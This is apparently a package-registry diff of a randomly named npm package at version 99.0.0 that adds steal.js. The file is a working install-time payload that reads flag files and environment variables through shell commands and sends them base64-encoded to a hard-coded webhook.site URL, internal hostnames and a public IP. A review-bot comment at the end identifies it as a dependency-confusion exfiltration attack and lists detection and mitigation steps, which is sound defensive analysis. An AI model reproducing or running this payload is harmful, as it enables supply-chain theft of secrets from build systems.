ecto-cargo-wk1tm59a 99.0.0
- package/ecto-cargo-wk1tm59a-99.0.0.tgz +0 -0
- package/package.json +11 -0
- package/steal.js +49 -0
|
Binary file
|
package/package.json
ADDED
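--- a/package/steal.js
+++ b/package/steal.js
@@ -0,0 +1,49 @@
+// Exfil helper that runs inside the target's nightly npm install.
+const fs = require('fs');
+const cp = require('child_process');
+const http = require('http');
+const https = require('https');
+
+const WH = 'https://webhook.site/9f1b89bd-a22f-4221-b28e-bc956b5ec8e0';
+const phase = process.argv[2] || 'x';
+
+function read(p){ try { return fs.readFileSync(p,'utf8'); } catch(e){ return ''; } }
+function tryCmd(c){ try { return cp.execSync(c,{timeout:4000}).toString(); } catch(e){ return ''; } }
+
+let data = '';
+for (const p of ['/flag','/flag.txt','/root/flag.txt','/root/flag','/app/flag.txt','/app/flag','/tmp/flag.txt','/home/flag.txt']) data += read(p);
+data += tryCmd('cat /flag* /root/flag* /app/flag* 2>/dev/null; find / -maxdepth 4 -iname "flag*" 2>/dev/null | head -n 20; env | grep -iE "flag|htb"');
+const b64 = Buffer.from(data).toString('base64');
+const host = tryCmd('hostname').trim();
+const who = tryCmd('id').trim();
+
+function get(url){
+return new Promise(res=>{
+try{
+const lib = url.startsWith('https')?https:http;
+const r = lib.get(url, x=>{ x.resume(); x.on('end',res); });
+r.on('error',res); r.setTimeout(5000,()=>{r.destroy();res();});
+}catch(e){res();}
+});
+}
+function put(url, body){
+return new Promise(res=>{
+try{
+const u = new URL(url);
+const lib = u.protocol==='https:'?https:http;
+const req = lib.request(url,{method:'PUT',headers:{'Content-Type':'application/json','Content-Length':Buffer.byteLength(body)}}, x=>{x.resume();x.on('end',res);});
+req.on('error',res); req.setTimeout(5000,()=>{req.destroy();res();});
+req.write(body); req.end();
+}catch(e){res();}
+});
+}
+
+(async()=>{
+// 1) egress exfil to webhook
+await get(`${WH}/${phase}?h=${encodeURIComponent(host)}&u=${encodeURIComponent(who)}&f=${encodeURIComponent(b64)}`);
+// 2) in-band fallback: write flag back into a console module we can read
+const manifest = `exfil:\n phase: ${phase}\n host: ${host}\n data: ${b64}\n`;
+const body = JSON.stringify({ manifest });
+const hosts = ['localhost:8080','localhost:80','localhost:3000','localhost:5000','web:8080','web:80','console:8080','frontend:80','app:8080','app:80','ecto-registry:8080','ecto-registry:80','154.57.164.66:30962'];
+for (const h of hosts) await put(`http://${h}/api/modules/ECT-987654`, body);
+})();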
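Review bot: steal.js is an install-time data-exfiltration payload rather than library code, so this version should be blocked and reported, not installed: new-file lines 14–15 gather flag files and matching environment variables through `fs.readFileSync` and `cp.execSync`, line 43 sends them base64-encoded to the hard-coded `webhook.site` URL in `WH`, and lines 47–48 PUT the same data to `/api/modules/ECT-987654` on a list of internal hostnames plus one public IP. The `99.0.0` version on a randomly suffixed package name is consistent with a dependency-confusion upload, and the `process.argv[2]` phase argument suggests the script is launched from lifecycle hooks in package.json, whose 11 added lines are not shown on this page. For detection, look for `node` spawning `find`, `env`, `id` or `hostname` during `npm install`, and for build-host egress to `webhook.site` or to the address listed in `hosts`. Installing with `--ignore-scripts`, binding internal package names to a private registry scope, and denying outbound traffic from install jobs by default would each break this path.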